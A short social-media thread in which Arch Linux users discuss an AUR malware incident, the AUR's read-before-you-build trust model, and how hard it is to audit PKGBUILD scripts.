🍉Arch users: How are you mitigating the AUR malware attack?
@avesbury_rosetta I just read through the build scripts like you're supposed to and also mostly just don't use the AUR
@avesbury_rosetta like for years the Arch wiki has been perfectly clear that the trust model of the AUR is "someone could just upload a malicious package, you absolutely have to read through it first before you build and install it"
@stellarskylark @avesbury_rosetta yeah but most people don't know how to read bash scripts, and sometimes a piece of software just isn't packaged literally anywhere else, like on Linux in general :(
@hazelnot @avesbury_rosetta pkgbuild scripts aren't usually that complicated, it's usually "fetch the source, run make, and install these files" and so it's relatively easy to see if it's doing something suspicious like fetching the wrong source or installing unusual files
like yeah I get it, it's not as user-friendly as other stuff, building packages is complicated. but it's not like this wasn't explicitly a possibility Arch users were warned to watch out for
@stellarskylark @avesbury_rosetta yeah but until now it was theoretical, if I'd known it would get this bad I would've never even touched the AUR
But then that means using shit like AppImages which, ew, fashy bullshit